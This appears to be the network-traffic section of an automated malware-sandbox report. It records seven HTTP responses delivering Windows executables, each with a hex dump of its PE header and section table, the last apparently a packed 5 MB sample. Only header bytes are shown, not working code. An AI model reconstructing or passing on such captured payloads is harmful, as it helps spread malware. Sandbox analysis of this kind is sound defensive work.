c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 08:50:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 08:50:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 08:50:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 08:50:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 08:50:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 08:50:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 03 Jan 2025 08:50:41 GMTContent-Type: application/octet-streamContent-Length: 5164032Last-Modified: Fri, 03 Jan 2025 08:35:40 GMTConnection: keep-aliveETag: "6777a15c-4ecc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 e0 4e 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 4f 00 00 04 00 00 62 98 4f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 90 24 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 a0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 a2 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 68 72 68 6a 6c 75 65 00 10 2a 00 00 c0 24 00 00 02 2a 00 00 a4 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 73 7a 73 66 65 6b 76 00 10 00 00 00 d0 4e 00 00 04 00 00 00 a6 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4e 00 00 22 00 00 00 aa 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
